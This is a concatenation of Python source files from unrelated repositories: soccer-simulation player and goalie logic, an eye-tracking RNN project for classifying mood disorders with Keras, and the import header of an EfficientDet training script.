def turn(self, angle):
""" Turns the player. """
moment = norm_angle(angle)
speed = norm(self.velocity)
angle = moment / (1 + INERTIA_MOMENT * speed)
self.orientation = self.orientation + angle
def dash(self, power):
""" Dash forward. """
power = bound(power, MINPOWER, MAXPOWER)
self.accelerate(power, self.orientation)
def can_kick(self, ball):
""" Determines whether the player can kick the ball. """
return self.distance(ball) <= KICKABLE
def kick_ball(self, ball, power, direction):
""" Kicks the ball. """
if self.can_kick(ball):
power = bound(power, MINPOWER, MAXPOWER)
power *= self.kick_power(ball)
ball.accelerate(power, self.orientation + direction)
def kick_towards(self, ball, power, direction):
""" Kick the ball directly to a direction. """
self.kick_ball(ball, power, direction - self.orientation)
def shoot_goal(self, ball, ypos):
""" Shoot the goal at a targeted position on the goal line. """
ypos = bound(ypos, -GOAL_WIDTH / 2, GOAL_WIDTH / 2)
target = np.array((PITCH_LENGTH / 2 + ball.size, ypos))
self.kick_to(ball, target)
def face_ball(self, ball):
""" Turn the player towards the ball. """
theta = angle_between(self.position, ball.position)
self.face_angle(theta)
def face_angle(self, angle):
""" Turn the player towards and angle. """
self.turn(angle - self.orientation)
def to_ball(self, ball):
""" Move towards the ball. """
if not self.facing_ball(ball):
self.face_ball(ball)
elif not self.can_kick(ball):
self.dash(10)
def kick_to(self, ball, target):
""" Kick the ball to a target position. """
if not self.can_kick(ball):
self.to_ball(ball)
else:
accel = (1 - ball.decay) * (target - self.position) - ball.velocity
power = norm(accel) / (self.kick_power(ball) * ball.power_rate)
theta = np.arctan2(accel[1], accel[0])
self.kick_towards(ball, power, theta)
def turn_ball(self, ball, angle):
""" Turn the ball around the player. """
if not self.can_kick(ball):
self.to_ball(ball)
elif not self.facing_angle(angle):
self.face_angle(angle)
elif self.size < self.distance(ball):
theta = self.ball_angles(ball, angle)
power = 0.1 / self.kick_power(ball)
self.kick_towards(ball, power, theta)
def dribble(self, ball, target):
""" Dribble the ball to a position. """
angle = angle_between(self.position, ball.position)
theta = angle_between(self.position, target)
if not self.can_kick(ball):
self.to_ball(ball)
elif ball.close_to(target):
pass
elif not angle_close(angle, theta):
self.turn_ball(ball, theta)
elif not self.facing_angle(theta):
self.face_angle(theta)
elif self.distance(ball) < (KICKABLE + self.size + ball.size) / 2:
self.kick_towards(ball, 1.5, theta)
else:
self.dash(10)
class Goalie(Player):
""" This class defines a special goalie player. """
def move(self, ball, player):
""" This moves the goalie. """
ball_end = ball.position + ball.velocity / (1 - ball.decay)
diff = ball_end - ball.position
grad = diff[1] / diff[0] if diff[0] != 0. else 0 # avoid division by 0
yint = ball.position[1] - grad * ball.position[0]
goal_y = grad * PITCH_LENGTH / 2 + yint
if ball_end[0] > PITCH_LENGTH / 2 and -GOAL_WIDTH / 2 - CATCHABLE <= goal_y <= GOAL_WIDTH / 2 + CATCHABLE \
and grad != 0:
grad2 = -1 / grad
yint2 = self.position[1] - grad2 * self.position[0]
ballx = (yint2 - yint) / (grad - grad2)
bally = grad * ballx + yint
target = np.array((ballx, bally))
self.move_towards(20, target)
self.orientation = angle_between(self.position, target)
else:
self.orientation = angle_between(self.position, ball_end)
self.move_towards(8, ball_end)
def move_towards(self, power, target):
""" Move towards target position. """
theta = angle_between(self.position, target)
self.accelerate(power, theta)
def can_catch(self, ball):
""" Determines whether the goalie can catch the ball. """
can_catch = self.distance(ball) < CATCHABLE
return self.np_random.random_sample() <= CATCH_PROBABILITY and can_catch
class Ball(Entity):
""" This class represents the ball, which has no orientation. """
def __init__(self, position):
""" The values for this class are defined by the ball constants. """
Entity.__init__(self, BALL_CONFIG)
self.position = position
def close_to(self, position):
""" Determines whether the ball is close to a postion. """
return norm(self.position - position) <= 1.5
def goal_distance(self):
""" Returns the distance from the goal box. """
if self.position[0] < PITCH_LENGTH / 2:
if self.position[1] < -GOAL_WIDTH / 2:
bot_corner = np.array((PITCH_LENGTH / 2, -GOAL_WIDTH / 2))
return norm(self.position - bot_corner)
elif self.position[1] > GOAL_WIDTH / 2:
top_corner = np.array((PITCH_LENGTH / 2, GOAL_WIDTH / 2))
return norm(self.position - top_corner)
else:
return PITCH_LENGTH / 2 - self.position[0]
else:
if self.position[1] < -GOAL_WIDTH / 2:
return GOAL_WIDTH / 2 - self.position[1]
elif self.position[1] > GOAL_WIDTH / 2:
return self.position[1] - GOAL_WIDTH / 2
else:
return 0
def in_field(self):
""" Checks if the ball has left the field. """
return self.in_area(0, PITCH_LENGTH / 2, -PITCH_WIDTH / 2, PITCH_WIDTH / 2)
def in_net(self):
""" Checks if the ball is in the net. """
return self.in_area(PITCH_LENGTH / 2, PITCH_LENGTH / 2 + GOAL_DEPTH, -GOAL_WIDTH / 2, GOAL_WIDTH / 2)
def in_goalbox(self):
""" Checks if the ball is in the goal box. """
return self.in_area(PITCH_LENGTH / 2 - GOAL_AREA_LENGTH, PITCH_LENGTH / 2, -GOAL_AREA_WIDTH / 2,
GOAL_AREA_WIDTH)
``` |
{
"source": "jonomon/VSMood",
"score": 2
} |
#### File: jonomon/VSMood/main_AAAI.py
```python
import numpy as np
import pandas as pd
import random
import logging
import argparse
import os
import matplotlib.pyplot as plt
random.seed(1114)
np.random.seed(129)
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import roc_auc_score, accuracy_score, log_loss
from sklearn.metrics import balanced_accuracy_score
from vsbrnn.run_vsb_sequence import run_vsb_sequence
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
## For basic usage check python main.py -h
def main():
data_type_options = ["fix", "glance", "fix-sequence"]
multi_instance_options = ['mean', '2d-mean', 'max-likelihood', 'similar', 'log-prob']
cnn_layers_options = ['1', '2', 'none']
region_model_type_options = ["semantic5", "grid9", "semantic8", "grid16"]
use_vsb_options = ['scan_path', 'glance_dur']
use_img_options = ['img_type', 'img_pos']
logging.basicConfig(filename='log.txt', level=logging.DEBUG, filemode="w")
parser = argparse.ArgumentParser(description='Run RNN for bipolar.')
parser.add_argument('data_type', type=str, help='options: {}'.format(data_type_options))
parser.add_argument('states', type=int, help='states')
parser.add_argument('multi_instance', type=str,
help='Multi instance options {}'.format(multi_instance_options))
parser.add_argument('--region_model_type', type=str,
help='region model types {} default region_clinical'.format(
region_model_type_options))
parser.add_argument('--cnn_layers', type=str,
help='cnn options {}'.format(cnn_layers_options))
parser.add_argument('--max_len', type=int, help='max length of sequence')
parser.add_argument('--use_vsb', type=str, nargs="+",
help='VSB features only with glance data_type, options: {}'.format(
use_vsb_options))
parser.add_argument('--use_img', type=str, nargs="+",
help='should use image properties, options: {}'.format(use_img_options))
parser.add_argument('--verbose', dest='verbose', action='store_true')
parser.add_argument('--print_sub', dest='print_sub', action='store_true')
parser.add_argument('--plot', dest='plot', action='store_true')
args = parser.parse_args()
data_type = args.data_type
states = args.states
max_len = args.max_len
use_vsb = args.use_vsb
use_img = args.use_img
region_model_type = args.region_model_type
cnn_layers = args.cnn_layers
multi_instance = args.multi_instance
verbose = args.verbose
print_sub = args.print_sub
plot = args.plot
logging.debug("Running %s with states=%s, mi=%s, max_length=%s, use_vsb=%s, use_img=%s",
data_type, states, multi_instance, max_len, use_vsb, use_img)
print("Running {} with states={}, mi={}, max_length={}, use_vsb={}, use_img={} region_model={} cnn_layers={}".format(data_type, states, multi_instance, max_len, use_vsb, use_img,
region_model_type, cnn_layers))
if data_type not in data_type_options:
print("{} not an available data_type option".format(data_type))
return
if data_type == "fix" and use_vsb:
print("VSB parameters are not available when in fixation")
return
if multi_instance not in multi_instance_options:
print("{} not available option for multi_instance".format(multi_instance))
return
if region_model_type != None and region_model_type not in region_model_type_options:
print("{} not available option for region_model_type".format(region_model_type))
return
if cnn_layers != None and cnn_layers not in cnn_layers_options:
print("{} not available option for cnn_layers".format(cnn_layers))
return
sub_cat, sub_prob = run_vsb_sequence(data_type, states, max_len,
use_vsb, use_img, region_model_type,
cnn_layers, multi_instance,
verbose=verbose, print_sub=print_sub)
sub_prob = np.array(sub_prob)
df = pd.DataFrame({"cat": sub_cat, "prob": sub_prob})
df.to_csv("output/{}-{}-{}-{}.csv".format(data_type, states, region_model_type, cnn_layers))
clf = LogisticRegression(class_weight="balanced")
clf.fit(sub_prob.reshape(-1, 1), sub_cat)
y_predicted = clf.predict(sub_prob.reshape(-1, 1))
auc_val = roc_auc_score(sub_cat, sub_prob)
acc_val = accuracy_score(sub_cat, y_predicted)
b_acc_val = balanced_accuracy_score(sub_cat, y_predicted)
log_loss_val = log_loss(sub_cat, sub_prob)
print("Avg auc={} acc_val={} b_acc_val={} log_loss_val={}\n\n".format(
auc_val, acc_val, b_acc_val, log_loss_val))
if plot:
from sklearn.metrics import roc_curve, auc
plt.clf()
fpr, tpr, _ = roc_curve(sub_cat, sub_prob, pos_label=1)
auc_val = auc(fpr, tpr)
plt.plot(fpr, tpr, color='#FF69B4',
label='ROC curve (area = {})'.format(round(auc_val, 2)))
plt.plot([0, 1], [0, 1], color='navy', lw=1, linestyle='--')
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.legend(loc="lower right")
filename = "img/{} with states={}, mi={}".format(data_type, states, multi_instance)
plt.savefig(filename + ".png")
pd.DataFrame([sub_cat, sub_prob]).T.to_csv(filename + ".csv")
if __name__ == "__main__":
main()
```
#### File: vsbrnn/data/data_importer.py
```python
import pandas as pd
import numpy as np
import csv
from data import FixationsList
from vsbrnn.utils import get_max_sequence_len, tokenise_sequence, tokenise_cat, tokenise_img_type
from keras.preprocessing.sequence import pad_sequences
imid_position_TGH = {1: (144, 41), 2: (834, 41), 3: (144, 583), 4: (834, 583)}
imid_position_TWH = {1: (460, 80), 2: (1150, 80), 3: (460, 590), 4: (1150, 590)}
imid_position = {"ED Week 2_TGH": imid_position_TGH, "ED Week 2_TWH": imid_position_TWH}
imid_size = {"ED Week 2_TGH": (302, 400), "ED Week 2_TWH": (310, 410)}
class DataImporter:
def __init__(self):
self.file_data = pd.read_csv("vsbrnn/data/vsb_data.csv",
delimiter="\t", quoting=csv.QUOTE_NONE)
self.vsbs = ["glance_dur", "no_fix", "scan_path"]
def _preprocess_data(self, cat_data, subject_data, sequence_data, img_label_data,
max_len, model):
subject_data = np.array(subject_data)
cat_data = np.array(cat_data)
img_label_data["img_type"] = tokenise_img_type(img_label_data["img_type"])
seq = tokenise_sequence(np.array(sequence_data), model)
max_len = get_max_sequence_len(sequence_data) if max_len == None else max_len
seq = pad_sequences(seq, maxlen=max_len)
output = [subject_data, cat_data, seq]
cols = ["Subject", "Cat", "Sequence"]
for i in img_label_data:
img_label = pad_sequences(img_label_data[i], maxlen=max_len)
output.append(img_label)
cols.append(i)
data = pd.DataFrame(output).T
data.columns = cols
return data
def get_vsb_sequence_data(self, max_len, model):
cat_data = []
sequence_data = []
img_label_data = {}
for i in ["img_type", "img_pos"]:
img_label_data[i] = []
vsb_data = {}
for i in self.vsbs:
vsb_data[i] = []
subject_data = []
for (subject, slide_no, test, cat, slides) in self._iterate_file_data(self.file_data):
vsbs, sequence, img_labels = self._parse_slide_to_vsb_sequence(test, slides, model)
for k, v in vsbs.iteritems():
vsb_data[k].append(v)
sequence_data.append(sequence)
cat_data.append(cat)
subject_data.append(subject)
for k, v in img_labels.iteritems():
img_label_data[k].append(v)
vsb_output = []
vsb_cols = []
for i in vsb_data:
vsb_data[i] = pad_sequences(vsb_data[i], maxlen=max_len, dtype="float")
vsb_output.append(vsb_data[i])
vsb_cols.append(i)
vsb_df = pd.DataFrame([np.array(subject_data)] + vsb_output).T
vsb_df.columns = ["Subject1"] + vsb_cols
output_data = self._preprocess_data(
cat_data, subject_data, sequence_data, img_label_data, max_len, model)
data = pd.concat([output_data, vsb_df], axis=1)
data["Subject1"] = None
return data
def get_fix_sequence_data(self, max_len):
cat_data = []
sequence_data = []
subject_data = []
img_data = []
for (subject, slide_no, test, cat, slides) in self._iterate_file_data(self.file_data):
sequence = self._parse_slide_to_fix_sequence(slides)
saliency_image = self._parse_slide_to_saliency_img(slides)
sequence_data.append(np.stack(sequence))
img_data.append(saliency_image)
cat_data.append(cat)
subject_data.append(subject)
subject_data = np.array(subject_data)
cat_data = np.array(cat_data)
padded_sequence = pad_sequences(sequence_data, maxlen=max_len, dtype="float32")
output = [subject_data, cat_data, padded_sequence, img_data]
data = pd.DataFrame(output).T
data.columns = ["Subject", "Cat", "Sequence", "Saliency"]
return data
def get_sequence_data(self, max_len, model):
cat_data = []
sequence_data = []
subject_data = []
img_label_data = {}
for i in ["img_type", "img_pos"]:
img_label_data[i] = []
for (subject, slide_no, test, cat, slides) in self._iterate_file_data(self.file_data):
sequence, img_labels = self._parse_slide_to_sequence(test, slides, model)
sequence_data.append(sequence)
cat_data.append(cat)
subject_data.append(subject)
for k, v in img_labels.iteritems():
img_label_data[k].append(v)
output_data = self._preprocess_data(
cat_data, subject_data, sequence_data, img_label_data, max_len, model)
return output_data
def _parse_slide_to_fix_sequence(self, slides):
slides.sort()
sequence = slides.convert_fixations_to_fix_sequence()
return sequence
def _parse_slide_to_saliency_img(self, slides):
saliency_map = slides.convert_fixations_to_saliency_map()
return saliency_map
def _parse_slide_to_sequence(self, test, slides, model):
slides.sort()
sequence, img_labels = slides.convert_fixations_to_sequence(test, model)
return sequence, img_labels
def _parse_slide_to_vsb_sequence(self, test, slides, model):
slides.sort()
vsbs, glance_label, img_labels = slides.convert_fixations_to_sequence_with_vsbs(
test, model, self.vsbs)
return vsbs, glance_label, img_labels
def _iterate_file_data(self, file_data):
subject_data = {}
subject_to_cat = {}
subject_to_test = {}
for row in file_data.iterrows():
abs_fix_x_pos = self._split_by_comma(row[1]["VASTNormalisedFixationX"])
abs_fix_y_pos = self._split_by_comma(row[1]["VASTNormalisedFixationY"])
fix_dur = self._split_by_comma(row[1]["FixationDurations_ms"])
fix_start = self._split_by_comma(row[1]["FixationStart"])
img_type = row[1]["imgType(s)"]
img_pos = row[1]["ImId"]
cat = row[1]["cat"]
subject = row[1]["Subject"]
slide_num = row[1]["SlideNumCalculator"]
test = row[1]["Test"]
i_size = imid_size[test]
i_pos = imid_position[test][img_pos]
fix_x_pos = [(a - i_pos[0]) / i_size[0] for a in abs_fix_x_pos]
fix_y_pos = [(a - i_pos[1]) / i_size[1] for a in abs_fix_y_pos]
fix_list = FixationsList.from_pos(
fix_x_pos, fix_y_pos, fix_start, fix_dur, img_type, img_pos)
if subject not in subject_data:
subject_data[subject] = {}
if subject not in subject_to_cat:
subject_to_cat[subject] = cat
if subject not in subject_to_test:
subject_to_test[subject] = test
if slide_num not in subject_data[subject]:
subject_data[subject][slide_num] = fix_list
else:
subject_data[subject][slide_num] = subject_data[subject][slide_num] + fix_list
for subject_i in subject_data:
for slide in subject_data[subject_i]:
cat = subject_to_cat[subject_i]
test = subject_to_test[subject_i]
yield subject_i, slide, test, cat, subject_data[subject_i][slide]
def _split_by_comma(self, comma_string):
output = []
array = comma_string.split(",")
for i in array:
i_o = i.replace("\"", "")
if self.is_float(i_o):
output.append(float(i_o))
return output
def is_float(self, s):
try:
float(s)
return True
except ValueError:
return False
```
#### File: vsbrnn/data/data.py
```python
import numpy as np
from vsbrnn.utils import makeGaussian
import matplotlib.pyplot as plt
class Fixation:
def __init__(self, x, y, start, dur, img_type, img_pos):
self.x = x
self.y = y
self.start = start
self.dur = dur
self.img_type = img_type
self.img_pos = img_pos
def __repr__(self):
return "fix @({x}, {y}),t={start}, d={dur}".format(
x=self.x, y=self.y, start=self.start, dur=self.dur)
def __str__(self):
return "fix @({x}, {y}),t={start}, d={dur}".format(
x=self.x, y=self.y, start=self.start, dur=self.dur)
class FixationsList:
def __init__(self, fix_list):
self.fixations = fix_list
@classmethod
def from_pos(cls, x_pos, y_pos, start, dur, img_type, img_pos):
fixations = []
for x, y, s, d in zip(x_pos, y_pos, start, dur):
fix = Fixation(x, y, s, d, img_type, img_pos)
fixations.append(fix)
return cls(fixations)
def __getitem__(self, i):
return self.fixations[0]
def __repr__(self):
return str(self.fixations)
def __add__(self, b):
fixations = self.fixations + b.fixations
return FixationsList(fixations)
def sort(self):
self.fixations = sorted(self.fixations, key=lambda x: x.start)
def convert_fixations_to_saliency_map(self, size=(40, 40)):
saliency_map = np.zeros(size)
for fix in self.fixations:
x = int(fix.x * (size[0] - 1))
y = int(fix.y * (size[1] - 1))
gaussian = makeGaussian(size=size, centre=(x, y), fwhm=5)
# if (x < size[0] and x > 0) and (y < size[1] and y > 0):
#saliency_map[y, x] += 1
saliency_map += gaussian
# saliency_map[saliency_map<1] = 0
return saliency_map
def convert_fixations_to_fix_sequence(self, size=(40, 40)):
sequence = []
for fix in self.fixations:
x = int(fix.x * (size[0] - 1))
y = int(fix.y * (size[1] - 1))
gaussian = makeGaussian(size=size, centre=(x, y), fwhm=5)
sequence.append(gaussian)
return sequence
def convert_fixations_to_sequence(self, test, region_model):
sequence = []
img_labels = {}
for i in ["img_pos", "img_type"]:
img_labels[i] = []
for fix in self.fixations:
if region_model.ignore_fixations_outside:
if (fix.x < 0.0 or fix.x > 1.0) or (fix.y < 0.0 or fix.y > 1.0):
continue
label = region_model.fix_in_region(test, fix)
sequence.append(label)
img_labels["img_type"].append(fix.img_type)
img_labels["img_pos"].append(fix.img_pos)
return sequence, img_labels
def convert_fixations_to_sequence_with_vsbs(self, test, region_model, vsb_selected):
sequence, _ = self.convert_fixations_to_sequence(test, region_model)
prev_label = sequence[0]
prev_fix = self.fixations[0]
fixes = [self.fixations[0]]
fix_ordered = []
glance_label = [sequence[0]]
img_labels = {}
for i in ["img_pos", "img_type"]:
img_labels[i] = []
for fix, label in zip(self.fixations[1:], sequence[1:]):
if prev_label != label and prev_fix.img_pos != fix.img_pos:
fix_ordered.append(fixes)
glance_label.append(label)
img_labels["img_pos"].append(prev_fix.img_pos)
img_labels["img_type"].append(prev_fix.img_type)
fixes = []
prev_label = label
prev_fix = fix
fixes.append(fix)
fix_ordered.append(fixes)
img_labels["img_pos"].append(prev_fix.img_pos)
img_labels["img_type"].append(prev_fix.img_type)
vsbs = {}
for i in vsb_selected:
vsbs[i] = []
for fixes in fix_ordered:
glance_duration = self._get_glance_duration(fixes)
length_scanpath = self._get_length_scanpath(fixes)
no_fix = self._get_no_fixations(fixes)
if "glance_dur" in vsb_selected:
vsbs["glance_dur"].append(glance_duration)
if "no_fix" in vsb_selected:
vsbs["no_fix"].append(no_fix)
if "scan_path" in vsb_selected:
vsbs["scan_path"].append(length_scanpath)
return vsbs, glance_label, img_labels
def _get_glance_duration(self, fixes):
return sum([a.dur for a in fixes])/1000
def _get_length_scanpath(self, fixes):
scan_path = 0
prev_coord = (fixes[0].x, fixes[0].y)
for fix in fixes[1:]:
coord = (fix.x, fix.y)
scan_path += np.sqrt((coord[0] - prev_coord[0])**2 + (coord[1] - prev_coord[1])**2)
prev_coord = coord
return scan_path
def _get_no_fixations(self, fixes):
return len(fixes)
```
#### File: VSMood/vsbrnn/multi_instance.py
```python
import matplotlib.pyplot as plt
import numpy as np
from vsbrnn.utils import get_log_likelihood
class MultiInstance():
def __init__(self, method, X_train, y_train, x_test, trainer):
self.method = method
self.X_train = X_train
self.y_train = y_train
self.x_test = x_test
self.trainer = trainer
def get_pred(self, preds):
if self.method == "mean":
return self.get_mean_pred(preds)
elif self.method == "1std-mean":
return self.get_n_std_mean_pred(1, preds)
elif self.method == "max-likelihood":
return self.get_max_likelihood(preds)
elif self.method == "similar":
return self.get_similar(preds)
elif self.method == "log-prob":
return self.get_log_prob(preds)
else:
return None
def get_mean_pred(self, preds):
return np.mean(preds)
def get_n_std_mean_pred(self, n, preds):
std = np.std(preds)
mean = np.mean(preds)
max_value = mean + n * std
min_value = mean - n * std
mean_preds = preds[np.logical_and(preds > min_value, preds < max_value)]
return np.mean(mean_preds)
def get_max_likelihood(self, preds):
X_predicts = self.trainer.predict(self.X_train)
n_d, bins_d, _ = plt.hist(
X_predicts[self.y_train[:, 1]==1], facecolor='green', alpha=0.5)
n_bd, bins_bd, _ = plt.hist(
X_predicts[self.y_train[:, 1]==0], facecolor='red', alpha=0.5)
log_like = [get_log_likelihood(a, n_bd, bins_bd,
n_d, bins_d) for a in preds]
return np.mean(log_like)
def get_similar(self, preds):
sequences = self.x_test["seq"]
n = sequences.shape[0]
distances = np.zeros(shape=(n, n))
for i in range(n):
for j in range(n):
if i != j:
sequence1 = sequences[i, :]
sequence2 = sequences[j, :]
leven_dist = self.levenshteinDistance(sequence1, sequence2)
distances[i, j] = leven_dist
mean_distances = np.mean(distances, axis=1)
max_distance_index = np.argmax(mean_distances)
preds_max_removed = np.delete(preds, max_distance_index)
return np.mean(preds_max_removed)
def levenshteinDistance(self, s1, s2):
if len(s1) > len(s2):
s1, s2 = s2, s1
distances = range(len(s1) + 1)
for i2, c2 in enumerate(s2):
distances_ = [i2+1]
for i1, c1 in enumerate(s1):
if c1 == c2:
distances_.append(distances[i1])
else:
distances_.append(
1 + min((distances[i1], distances[i1 + 1], distances_[-1])))
distances = distances_
return distances[-1]
def get_log_prob(self, preds):
log_preds = np.log(preds)
log_preds = np.clip(log_preds, -1e15, 1e15)
return np.mean(log_preds)
```
#### File: VSMood/vsbrnn/training.py
```python
import numpy as np
np.random.seed(616)
from keras.models import Sequential
from keras.models import Model
from keras.layers.core import Dense, Activation
from keras.layers import LSTM, GRU
from keras.layers import Embedding
from keras.layers import Conv2D, MaxPooling2D, Dropout, Flatten, MaxoutDense
from keras.layers import Input, concatenate, TimeDistributed
from keras.callbacks import EarlyStopping, History, Callback, ModelCheckpoint
from keras.optimizers import Adam
#from vis.visualization import visualize_activation, visualize_saliency, visualize_cam
from scipy.misc import imsave
from sklearn.metrics import roc_auc_score
import logging
import matplotlib.pyplot as plt
class Auc_callback(Callback):
def __init__(self, validation_data=(), interval=10, verbose=False):
super(Callback, self).__init__()
self.interval = interval
self.verbose = verbose
self.X_val, self.y_val = validation_data
def on_epoch_end(self, epoch, logs={}):
if epoch % self.interval == 0:
y_pred = self.model.predict(self.X_val, verbose=0)[:, 1]
score = roc_auc_score(self.y_val[:, 1], y_pred)
if self.verbose:
print("AUC - epoch: {:d} - score: {:.6f}".format(epoch, score))
class RnnTrain:
def __init__(self, states, **kwargs):
self.states = states
self.batch_size = 40
self.learning_rate = 0.001
self.metrics = ['accuracy']
self.properties = kwargs
self.net = None
def _init_single_modal_net(self, **kwargs):
sequence_size = kwargs["seq"]["shape"]
max_features = kwargs["seq"]["max"]
sequence_input = Input(shape=sequence_size, name="sequence_input")
sequence_dense = Embedding(max_features, self.states)(sequence_input)
encoder = LSTM(self.states, dropout=0.5, recurrent_dropout=0.0)(sequence_dense)
output = Dense(2, activation="softmax", name="classification")(encoder)
model = Model(inputs=sequence_input, outputs=output)
adam = Adam(lr=0.01)
model.compile(loss='categorical_crossentropy', optimizer=adam,
metrics=self.metrics)
return model
def _init_modal_net(self, **kwargs):
sequence_size = kwargs["seq"]["shape"]
max_features = kwargs["seq"]["max"]
sequence_input = Input(shape=sequence_size, name="sequence_input")
sequence_dense = Embedding(max_features, self.states)(sequence_input)
feature_inputs = []
feature_outputs = []
if "use_vsb" in kwargs:
shape = kwargs["use_vsb"]["shape"]
feature_input = Input(shape=shape, name="use_vsb")
feature_dense = Dense(self.states)(feature_input)
feature_inputs.append(feature_input)
feature_outputs.append(feature_dense)
if "use_img_type" in kwargs:
shape = kwargs["use_img_type"]["shape"]
max_features = kwargs["use_img_type"]["max"]
feature_input = Input(shape=shape, name="use_img_type")
feature_dense = Embedding(max_features, self.states)(feature_input)
feature_inputs.append(feature_input)
feature_outputs.append(feature_dense)
if "use_img_pos" in kwargs:
shape = kwargs["use_img_pos"]["shape"]
max_features = kwargs["use_img_pos"]["max"]
feature_input = Input(shape=shape, name="use_img_pos")
feature_dense = Embedding(max_features, self.states)(feature_input)
feature_inputs.append(feature_input)
feature_outputs.append(feature_dense)
merge_layer = concatenate([sequence_dense] + feature_outputs)
encoder = LSTM(self.states + len(feature_outputs) * self.states,
dropout=0.7, recurrent_dropout=0.7)(merge_layer)
# recurrent_dropout to d=rd=0.7 for psyc paper, d=0.5 rd=0 for technical
output = Dense(2, activation="softmax", name="classification")(encoder)
model = Model(inputs=[sequence_input] + feature_inputs, outputs=[output])
adam = Adam(lr=self.learning_rate)
model.compile(loss='categorical_crossentropy', optimizer=adam,
metrics=self.metrics)
return model
def make_net(self, X):
max_features = np.max(X["seq"]) + 1
sequence_shape = (X["seq"].shape[1],)
net_arguments = {}
net_arguments["seq"] = {"shape": sequence_shape, "max": max_features}
if "use_vsb" in X:
vsb_shape = (X["use_vsb"].shape[1], X["use_vsb"].shape[2])
net_arguments["use_vsb"] = {"shape": vsb_shape}
if "use_img_type" in X:
img_type_shape = (X["use_img_type"].shape[1],)
max_img_type_features = np.max(X["use_img_type"]) + 1
net_arguments["use_img_type"] = {"shape": img_type_shape,
"max": max_img_type_features}
if "use_img_pos" in X:
img_pos_shape = (X["use_img_pos"].shape[1],)
max_img_pos_features = np.max(X["use_img_pos"]) + 1
net_arguments["use_img_pos"] = {"shape": img_pos_shape,
"max": max_img_pos_features}
if "use_vsb" in X or "use_img_type" in X or "use_img_pos" in X:
net = self._init_modal_net(**net_arguments)
else:
net = self._init_single_modal_net(**net_arguments)
return net
def make_X_list(self, *args):
X = args[0] # let X be the first argument,
# assuming that the shape for the data are the same
X_base_list = []
for arg in args:
if X.keys() == ["seq"]:
X_list = arg["seq"]
else:
X_list = [arg["seq"]]
if "use_vsb" in X:
X_list.append(arg["use_vsb"])
if "use_img_type" in X:
X_list.append(arg["use_img_type"])
if "use_img_pos" in X:
X_list.append(arg["use_img_pos"])
X_base_list.append(X_list)
if len(X_base_list) == 1:
return X_base_list[0]
else:
return tuple(X_base_list)
def do_simple_fix_training(self, X_train, y_train, epochs=10):
self.net = self.make_net(X_train)
X_train_list = self.make_X_list(X_train)
his = History()
self.net.fit(X_train_list, y_train, verbose=self.properties['verbose'], shuffle=True,
batch_size=self.batch_size, epochs=epochs,
class_weight="auto",
callbacks=[his])
def do_training(self, X_train, y_train, X_valid, y_valid):
self.net = self.make_net(X_train)
X_train_list, X_valid_list = self.make_X_list(X_train, X_valid)
his = History()
es = EarlyStopping(patience=30, verbose=False, mode='min')
mc = ModelCheckpoint("ModelCheckpoint/tmp.pkg",
save_best_only=True, save_weights_only=True)
self.net.fit(X_train_list, y_train, verbose=self.properties["verbose"],
shuffle=True,
batch_size=self.batch_size, epochs=10000,
validation_data=(X_valid_list, y_valid),
class_weight="auto",
callbacks=[his, es, mc])
self.net.load_weights("ModelCheckpoint/tmp.pkg")
# output_string = ""
# for i in his.history.keys():
# output_string += "{}={} ".format(i, his.history[i][-1])
#return net, output_string
def predict(self, X):
X_list = [X["seq"]]
if "use_vsb" in X:
X_list.append(X["use_vsb"])
if "use_img_type" in X:
X_list.append(X["use_img_type"])
if "use_img_pos" in X:
X_list.append(X["use_img_pos"])
return self.net.predict(X_list, verbose=0)[:, 1]
class RNNFeatureTrain:
def __init__(self, cnn_layer, states, **kwargs):
self.cnn_layer = cnn_layer
self.states = states
self.batch_size = 40
self.learning_rate = 0.001
self.metrics = ['accuracy']
self.properties = kwargs
self.net = None
def make_net(self, X):
input_size = (None, X["seq"].shape[2], X["seq"].shape[3], X["seq"].shape[4])
sequence_input = Input(shape=input_size, name="sequence_input")
convs = Sequential()
if self.cnn_layer in [None, "1", "2"]:
convs.add(Conv2D(10, kernel_size=(3, 3), activation="relu",
input_shape=(
X["seq"].shape[2], X["seq"].shape[3], X["seq"].shape[4])))
convs.add(MaxPooling2D((2, 2), strides=(2, 2)))
if self.cnn_layer in [None, "2"]:
convs.add(Conv2D(20, kernel_size=(3, 3), activation="relu"))
convs.add(MaxPooling2D((2, 2), strides=(2, 2)))
if self.cnn_layer in [None]:
convs.add(Conv2D(40, kernel_size=(3, 3), activation="relu"))
convs.add(MaxPooling2D((2, 2), strides=(2, 2)))
if self.cnn_layer == "none":
convs.add(Flatten(input_shape=(
X["seq"].shape[2], X["seq"].shape[3], X["seq"].shape[4])))
else:
convs.add(Dropout(0.5))
convs.add(Flatten())
convs.add(MaxoutDense(output_dim=self.states/2,nb_feature=2, input_dim=self.states))
convs.add(Dropout(0.5))
convs.add(Dense(self.states/2, activation="relu", name="features"))
convs.add(Dropout(0.5))
x = TimeDistributed(convs)(sequence_input)
encoder = LSTM(self.states/2, dropout=0.5, recurrent_dropout=0.0)(x)
output = Dense(2, activation="softmax", name="classification")(encoder)
model = Model(inputs=sequence_input, outputs=output)
adam = Adam(lr=self.learning_rate)
model.compile(loss='categorical_crossentropy', optimizer=adam,
metrics=self.metrics)
return model
def make_X_list(self, *args):
X_base_list = []
for arg in args:
X_base_list.append(arg['seq'])
if len(X_base_list) == 1:
return X_base_list[0]
else:
return tuple(X_base_list)
def do_training(self, X_train, y_train, X_valid, y_valid):
self.net = self.make_net(X_train)
X_train_list, X_valid_list = self.make_X_list(X_train, X_valid)
his = History()
es = EarlyStopping(patience=30, verbose=False, mode='min')
mc = ModelCheckpoint("ModelCheckpoint/tmp-feat.pkg",
save_best_only=True, save_weights_only=True)
self.net.fit(X_train_list, y_train, verbose=self.properties["verbose"],
shuffle=True,
batch_size=self.batch_size, epochs=10000,
validation_data=(X_valid_list, y_valid),
class_weight="auto",
callbacks=[his, es, mc])
self.net.load_weights("ModelCheckpoint/tmp-feat.pkg")
# output_string = ""
# for i in his.history.keys():
# output_string += "{}={} ".format(i, his.history[i][-1])
#return net, output_string
def predict(self, X):
X_list = [X["seq"]]
return self.net.predict(X_list, verbose=0)[:, 1]
``` |
{
"source": "JonOnEarth/efficientdet-keras",
"score": 3
} |
#### File: efficientdet-keras/nets/efficientdet_training.py
```python
from keras import backend as K
import keras
import tensorflow as tf
import numpy as np
from random import shuffle
from utils import backend
from PIL import Image
from keras.utils.data_utils import get_file
